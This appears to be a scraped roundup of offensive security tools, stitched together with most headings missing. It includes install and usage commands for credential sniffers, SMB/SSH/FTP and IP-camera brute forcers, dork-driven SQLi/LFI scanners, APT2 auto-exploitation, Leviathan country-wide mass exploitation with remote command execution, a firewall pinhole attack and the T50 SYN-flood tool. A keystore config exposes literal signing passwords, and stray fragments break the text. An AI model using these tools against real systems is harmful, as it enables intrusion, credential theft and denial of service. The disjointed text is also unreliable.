This tool was developed in order to provide help in this case:
During a reconnaissance phase of an authorized penetration test at network level, when a open WIFI network was identified in which hosts are connected and exposes SMB Windows shares (see port 445 opened) / FTP server / SSH access, the goal is to perform a quick evaluation from a smartphone (more easy to launch and hide than a laptop) of the attack surface represented by theses points.
The application allow to download and keep password dictionaries from predefined list of dictionaries or from the device itself (for tailored password dictionaries).
Follow these steps:
1. Create a JKS keystore with a RSA keypair.
2. Create a file named keystore.properties at the root folder level (same location than the file gradlew) with the following content:
storePassword=[StorePassword] keyPassword=[KeyPassword] keyAlias=[KeyAlias] storeFile=[Store file full location or relative location from app sub folder]
# Configuration of the keystore used to sign the released APK storePassword=fB5YDpcvTvQH7Sg399xG49YFK keyPassword=gHTaEq93Xe93c3rWJu8v33WVB keyAlias=keys storeFile=../release-keystore.jks
3. Use the following command line gradlew clean cleanBuildCache assembleRelease
4. APK is available in folder [ROOT_FOLDER]/app/build/outputs/apk
The application should be combined with the following applications to enhance efficiency:
– FING: For WIFI network discovery and target identification,
– FILE MANAGER: To access to Windows SMB Shares, FTP, SSH (via SFTP) content after the credentials identification.
– JUICE SSH: To access via SSH shell if SFTP is not enabled.
Use and Download:
git clone https://github.com/righettod/access-brute-forcer && cd access-brute-forcer gradlew clean cleanBuildCache assembleDebug Or Download APK Binary Here; https://rink.hockeyapp.net/apps/64dd8a3981644cfd9923617dc0d05989
+ URLs visited
+ POST loads sent
+ HTTP form logins/passwords
+ HTTP basic auth logins/passwords
+ HTTP searches
+ FTP logins/passwords
+ IRC logins/passwords
+ POP logins/passwords
+ IMAP logins/passwords
+ Telnet logins/passwords
+ SMTP logins/passwords
+ SNMP community string
+ NTLMv1/v2 all supported protocols: HTTP, SMB, LDAP, etc.
git clone https://github.com/DanMcInerney/net-creds && cd net-creds pip install -r requirements.txt sudo python net-creds.py -i eth0 sudo python net-creds.py -f 192.168.1.1
Shodanwave is a tool for exploring and obtaining information from cameras specifically Netwave IP Camera. The tool uses a search engine called shodan that makes it easy to search for cameras online.
What does the tool to? Look, a list!
+ Brute force
+ SSID and WPAPSK Password Disclosure
+ E-mail, FTP, DNS, MSN Password Disclosure
This is an example of shodan wave running, the password was not found through raw force so the tool tries to leak the camera’s memory. If the tool finds the password it does not try to leak the memory.
+ shodan apikey https://www.shodan.io/
git clone https://github.com/fbctf/shodanwave && cd shodanwave pip install -r requirements.txt create user.txt (for dictionary user) create password.txt (for dictionary password) python shodanwave.py -u user.txt -w password.txt -k (your shodan api key)
V3n0M is a free and open source scanner. Evolved from baltazar’s scanner, it has adapted several new features that improve fuctionality and usability. It is mostly experimental software.
This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.
Very useful for executing:
– Cloudflare Resolver[Cloudbuster]
– Metasploit Modules Scans[To be released]
– LFI->RCE and XSS Scanning[LFI->RCE & XSS]
– SQL Injection Vuln Scanner[SQLi]
– Extremely Large D0rk Target Lists
– AdminPage Finding
– Toxin Vulnerable FTPs Scanner
– DNS BruteForcer
– Python 3.6 Asyncio based scanning
git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner && cd V3n0M-Scanner python3 setup.py install --user cd src python3 v3nom.py
penthefire – Security tool implementing attacks test the resistance of firewall.
Data packet is received, the attacker send a forged DCC command.
Client connection is open by the attacker. Connect to the ftp server behind a firewall and initiate a real connection. Once the session is setup, he launch the attack by sending a forged 227 command, if using IPv6 using 229 command.
– python 2.7.x with NetfilterQueue module
How to use:
Install Dependencies Debian/Ubuntu Base system apt-get install build-essential python-dev libnetfilter-queue-dev pip install NetfilterQueue git clone https://github.com/BREAKTEAM/penthefire && cd penthefire example: python wolffirewall.py --attacker -t 192.168.22.2 --helper ftp --port 29 -v -i eth0 192.168.22.2 python client.py -t 192.168.22.2 --port 29
It has four (4) levels of testing.
– INFORMATIONAL: Tells you if it can connect to ports ont he internet.
– LEVEL 0: Tells you if it can FTP a file to the internet in cleartext.
– LEVEL 1: Tells you if it can SCP files to the internet over various ports.
– LEVEL 2: Tells you if it can send the same sensitive file to the internet via DNS queries.
It does each of these in succession and then reports on which levels it failed to block.
+ Python 2.7.x
+ nc, curl and git
git clone https://github.com/danielmiessler/egression && cd egression cd dnsfilexfer sudo pip install -r requirements.txt cd .. ./egression.sh
git clone https://github.com/frizb/Vanquish && cd Vanquish python Vanquish2.py
This tool will perform an NMap scan, or import the results of a scan from Nexpose, Nessus, or NMap. The processesd results will be used to launch exploit and enumeration modules according to the configurable Safe Level and enumerated service information.
All module results are stored on localhost and are part of APT2‘s Knowledge Base (KB). The KB is accessible from within the application and allows the user to view the harvested results of an exploit module.
APT2 uses the default.cfg file in the root directory. Edit this file to configure APT2 to run as you desire. Current options include:
anonftp Test for Anonymous FTP
anonldap Test for Anonymous LDAP Searches
crackPasswordHashJohnTR Attempt to crack any password hashes
gethostname Determine the hostname for each IP
httpoptions Get HTTP Options
httpscreenshot Get Screen Shot of Web Pages
httpserverversion Get HTTP Server Version
hydrasmbpassword Attempt to bruteforce SMB passwords
impacketsecretsdump Test for NULL Session
msf_dumphashes Gather hashes from MSF Sessions
msf_gathersessioninfo Get Info about any new sessions
msf_javarmi Attempt to Exploit A Java RMI Service
msf_ms08_067 Attempt to exploit MS08-067
msf_openx11 Attempt Login To Open X11 Service
msf_smbuserenum Get List of Users From SMB
msf_snmpenumshares Enumerate SMB Shares via LanManager OID Values
msf_snmpenumusers Enumerate Local User Accounts Using LanManager/psProcessUsername OID Values
msf_snmplogin Attempt Login Using Common Community Strings
msf_vncnoneauth Detect VNC Services with the None authentication type
nmapbasescan Standard NMap Scan
nmaploadxml Load NMap XML File
nmapms08067scan NMap MS08-067 Scan
nmapnfsshares NMap NFS Share Scan
nmapsmbshares NMap SMB Share Scan
nmapsmbsigning NMap SMB-Signing Scan
nmapsslscan NMap SSL Scan
nmapvncbrute NMap VNC Brute Scan
nullsessionrpcclient Test for NULL Session
nullsessionsmbclient Test for NULL Session
openx11 Attempt Login To Open X11 Servicei and Get Screenshot
reportgen Generate Report
responder Run Responder and watch for hashes
searchftp Search files on FTP
searchnfsshare Search files on NFS Shares
searchsmbshare Search files on SMB Shares
sslsslscan Determine SSL protocols and ciphers
ssltestsslserver Determine SSL protocols and ciphers
userenumrpcclient Get List of Users From SMB
Usage & download:
git clone https://github.com/MooseDojo/apt2 && cd apt2 pip install python-nmap vi default.cfg (then edit them with your MSGRPC config) see https://help.rapid7.com/metasploit/Content/api-rpc/getting-started-api.html ./apt2.py Upgrade: git pull origin master
Source: https://github.com/MooseDojo | Our Post Before
Usage of apt2 for attacking infrastructures without prior mutual consistency can be considered as an illegal activity. It is the final user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.
+ Python 2.7.x
git clone https://github.com/x90skysn3k/brutespray && cd brutespray First do an nmap scan with '-oA nmap.gnmap'. Command: python brutespray.py -h Example: python brutespray.py --file nmap.gnmap --services all --threads 3 --hosts 5
The main goal of this project is auditing as many system as possible in country-wide or in a wide IP range.
+ Discovery: Discover FTP, SSH, Telnet, RDP, MYSQL services running inside a specific country or in an IP range via Shodan, Censys. It’s also possible to manually discover running services on a IP range by integrated “masscan” tool.
+ Brute Force: You can brute force the discovered services with integrated “ncrack” tool. It has wordlists which includes most popular combinations and default passwords for specific services.
+ Remote Command Execution: You can run system commands remotely on compromised devices.
+ SQL Injection Scanner: Discover SQL injection vulnerabilities on websites with specific country extension or with your custom Google Dork.
+ Exploit Specific Vulnerabilities: Discover vulnerable targets with Shodan, Censys or masscan and mass exploit them by providing your own exploit or using preincluded exploits.
+ Python version 2.7.x is required for running this program.
+ Supported platforms: Linux (Kali Linux, Debian, Ubuntu), macOS
Install Kali Linux: git clone https://github.com/leviathan-framework/leviathan.git && cd leviathan pip install -r requirements.txt Debian/Ubuntu: git clone https://github.com/leviathan-framework/leviathan.git && cd leviathan sudo bash scripts/debian_install.sh Mac OS: /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" git clone https://github.com/leviathan-framework/leviathan.git && cd leviathan bash scripts/macos_install.sh python leviathan.py
Changelog v5.6.7 fix1:
+ Acertos no build system.
+ Remove specific build block
It seems that this new check makes it FTBFS (fail to build from source) on armhf, armel, mips64el, x32 (all on linux).
T50 (f.k.a. F22 Raptor) is a tool designed to perform “Stress Testing”. The concept started on 2001, right after release ‘nb-isakmp.c’, and the main goal was:
– Having a tool to perform TCP/IP protocol fuzzer, covering common regular
protocols, such as: ICMP, TCP and UDP.
Things have changed, and the T50 became a good unique resource capable to perform “Stress Testing”. And, after checking the “/usr/include/linux”, some protocols were chosen to be part of its coverage:
a) ICMP – Internet Control Message Protocol
b) IGMP – Internet Group Management Protocol
c) TCP – Transmission Control Protocol
d) UDP – User Datagram Protocol
Why “Stress Testing”? Well, because when people are designing a new network infra-structure (eg. Datacenter serving to Cloud Computing) they think about:
b) Load Balancing
c) Backup Sites (Cold Sites, Hot Sites, and Warm Sites)
d) Disaster Recovery
e) Data Redundancy
f) Service Level Agreements
But almost nobody thinks about “Stress Testing”, or even performs any test to check how the networks infra-structure behaves under stress, under overload, and under attack. Even during a Penetration Test, people prefer not runningany kind of Denial-of-Service testing. Even worse, those people are missing one of the three key concepts of security that are common to risk management:
T50 was designed to perform “Stress Testing” on a variety of infra-structure network devices (Version 2.45), using widely implemented protocols, and after some requests it was was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP, TCP and UDP), some infra-structure specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP, EIGRP and OSPF).
This new version (Version 5.3) is focused on internal infra-structure, which allows people to test the availability of its resources, and cobering:
a) Interior Gateway Protocols (Distance Vector Algorithm):
1. Routing Information Protocol (RIP)
2. Enhanced Interior Gateway Routing Protocol (EIGRP)
b) Interior Gateway Protocols (Link State Algorithm):
1. Open Shortest Path First (OSPF)
c) Quality-of-Service Protocols:
1. Resource ReSerVation Protocol (RSVP).
d) Tunneling/Encapsulation Protocols:
1. Generic Routing Encapsulation (GRE).
T50 is a powerful and unique packet injector tool, which is capable to:
a) Send sequentially the following fifteen (15) protocols:
1. ICMP – Internet Control Message Protocol
2. IGMPv1 – Internet Group Management Protocol v1
3. IGMPv3 – Internet Group Management Protocol v3
4. TCP – Transmission Control Protocol
5. EGP – Exterior Gateway Protocol
6. UDP – User Datagram Protocol
7. RIPv1 – Routing Information Protocol v1
8. RIPv2 – Routing Information Protocol v2
9. DCCP – Datagram Congestion Control Protocol
10. RSVP – Resource ReSerVation Protocol
11. GRE – Generic Routing Encapsulation
12. IPSec – Internet Protocol Security (AH/ESP)
13. EIGRP – Enhanced Interior Gateway Routing Protocol
14. OSPF – Open Shortest Path First
b) It is the only tool capable to encapsulate the protocols (listed above) within Generic Routing Encapsulation (GRE).
c) Send an (quite) incredible amount of packets per second, making it a “second to none” tool:
-> More than 1,000,000 pps of SYN Flood (+50% of the network uplink) in
a 1000BASE-T Network (Gigabit Ethernet).
-> More than 120,000 pps of SYN Flood (+60% of the network uplink) in a 100BASE-TX Network (Fast Ethernet).
d) Perform “Stress Testing” on a variety of network infrastructure, network devices and security solutions in place.
e) Simulate “Distributed Denial-of-Service” & “Denial-of-Service” attacks, validating Firewall rules, Router ACLs, Intrusion Detection System and Intrusion Prevention System policies.
The main differentiator of the T50 is that it is able to send all protocols, sequentially, using one single SOCKET, besides it is capable to be used to modify network routes, letting IT Security Professionals performing advanced “Penetration Test”.
git clone https://github.com/fredericopissarra/t50 cd t50 autoconf -f -i ./configure make cd release ./t50 update cd <your Clone Folder> git pull
Master.zip | Clone Url
Source : https://github.com/fredericopissarra | Our Post Before
+ Spoofed attack on helpers
+ Abusive usage of helpers
+ TTL attack on DPI solution
Description of the attack against helper
Some network protocols are using multiple connections for the exchange between a client and a server. The most known example is ftp where command goes through a connection on port 21 and where data exchange are done with two different mode (connection from port 20 or dynamic connection). Some firewall implementation implement application layer gateway (ALG) to be able to detect this parallel connection and be able to autorize them dynamically. Other solutions are to use application relay (transparent proxy) or to open all the possible flow (read almost everything).
The ALG analyse the traffic and detect and parse the command sent between the peers to declare the parameters of the parallel connections. Once done they open temporary pin hole in the firewall to let the probable traffic goes through. The idea of this attack is to forge this type of messages to open pin hole in the firewall but pin hole that should not have been open.
– Attacker computer is on a network directly connected to the firewall.
– Firewall is sensible to the attack (for example, Netfilter with rp_filter set to 0)
– Attacker is able to sniff data packet (or by pcap sniffing or by running himself a data connection)
The cinematic is the following :
1. Sniffer on the attacker network capture one packet from the protocol flow
+-+ it reverse the ethernet dst and src
+-+ it increase id in IP and seq for TCP
+-+ it set payload to the wanted command (with selected port)
2. The forged packet is sent on the interface connected to the firewall
3. Firewall transmit the packet back to the client and is now expecting a packet with caracteristic based on attacker input
git clone https://github.com/regit/opensvp && cd opensvp python setup.py install opensvp -h